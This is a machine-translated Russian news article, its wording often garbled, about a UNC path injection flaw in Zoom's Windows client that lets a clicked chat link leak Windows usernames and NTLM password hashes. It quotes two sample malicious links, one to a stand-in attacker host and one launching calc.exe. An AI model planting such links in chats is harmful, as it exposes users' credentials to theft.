Популярные видео-конференц-связи обслуживание зум имеет высокий риск безопасности, проблемы в ее Windows-клиента, который может быть использован для общества удаленное выполнение кода и, что еще хуже, чтобы отслеживать и анализировать маркеры безопасности доступа к сетевым ресурсам, исследователи безопасности нашли.

Мэтью Хики кибербезопасности фирма Hacker которая специализируется тестирование на проникновение и анализ уязвимостей, сообщил сайт ITnews , что масштаб рабочего стола Windows клиент подвержены высокому риску универсальное соглашение об именовании (UNC-путь) инъекция изъян в том, как приложение обрабатывает универсальный идентификатор ресурса пути.

“Злоумышленник может внедрить на ссылку, такие как \\attacker.computer.com\company_salary.xlsx в чате, кто-то должен нажать на ссылку, он будет подвергать их Windows имя пользователя, имя домена или имя компьютера и хешированную версию пароля Windows,” Хикки..

“Злоумышленник может анализировать те хешированных значений паролей и доступа, такие как Microsoft Exchange приложение Outlook электронной почты и SharePoint”, – добавил он.

Хикки испытана открытие другого исследователя, который идет по _g0dmode прозвище, и который заметил, это было возможно, чтобы захватить сети Windows диспетчера локальной сети NT (NTLM) и хэши через брешь.

Возможно расширение до обнаружения уязвимости, Хикки сообщил сайт ITnews , что можно запускать команды и установки вредоносных программ на клиентов.

Если злоумышленник попытается сделать это, более новые версии Windows будет предупреждать пользователей о том, что атака удаленное выполнение кода может быть происходит.

Например, можно запускать классические окна удаленного выполнения кода подтверждения, запустив встроенный калькулятор приложение, отправив ссылку: \\127.0.0.1\с$\Windows\System32\Calc.exe

Диалоговые окна для оповещения отображается только для исполняемых файлов и команд.

“Если злоумышленник попытается утечка учетных данных, не отображаются такие предупреждения”, – сказал Хикки.

Хикки продемонстрировали захват документов на сайт ITnews.

Брешь затрагивает клиента зум только для Windows, сказал Хикки. О компании Apple и macOS, клиент зум не сделать ссылки кликабельны.

Несмотря на предупреждения, когда злоумышленники пытаются удаленно выполнять код, сказал Хикки недостаток должен быть оценен как очень серьезную.

“Я, как правило, результат как средний риск, однако в свете того, что вопрос легко использована посредством “ZoomBombing” (угадывание заседания посредством грубой силы) и более восприимчивыми к эксплуатации в рабочей от дома климата, я бы посоветовал, что это высокий риск, проблема”, – сказал он.

“Вопрос может рассматриваться повышенного риска несмотря на то, что корпоративные и корпоративные сети, как правило, фильтровать исходящие порты для использования этой проблеме, тех, кто работает дома не будут подвержены такой же защитой”, – добавил Хикки.

“Большинство домашних пользователей не будет при условии строгого внешнего использования сети, как это обычно бывает при работе с корпоративной сети”.

Хикки пояснил, что пока нет интернет-провайдеров, которые фильтруют порты Windows, чтобы предотвратить распространение вредоносных программ, это скорее исключение, и большинство домашнего широкополосный доступ в интернет позволит исходящий доступ к портам, нужно эксплуатировать уязвимости, связанной с УНК.

Он сообщил, что вопрос увеличения через Twitter.

Как его популярность возросла с людей и студентов Работа на дому в строгой изоляции коронавирус, безопасность зум пришел под пристальным вниманием.

Другие исследователи нашли , что увеличение компании каталог объектов утечку адресов электронной почты и фотографий, и видео-конференций приложение не использовать конец-в-конец шифрования для защиты от перехвата звонков.

США Федеральное бюро расследований Бостоне офиса также издал предупреждение за сыпь ZoomBombing атак, в которых непрошенных людей захватить видео конференций, в некоторых случаях подвергая себя и/или размещение материалов непристойного содержания.

сайт ITnews запросил комментарий от зума на уязвимости и обновит историю, когда он прибывает.

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here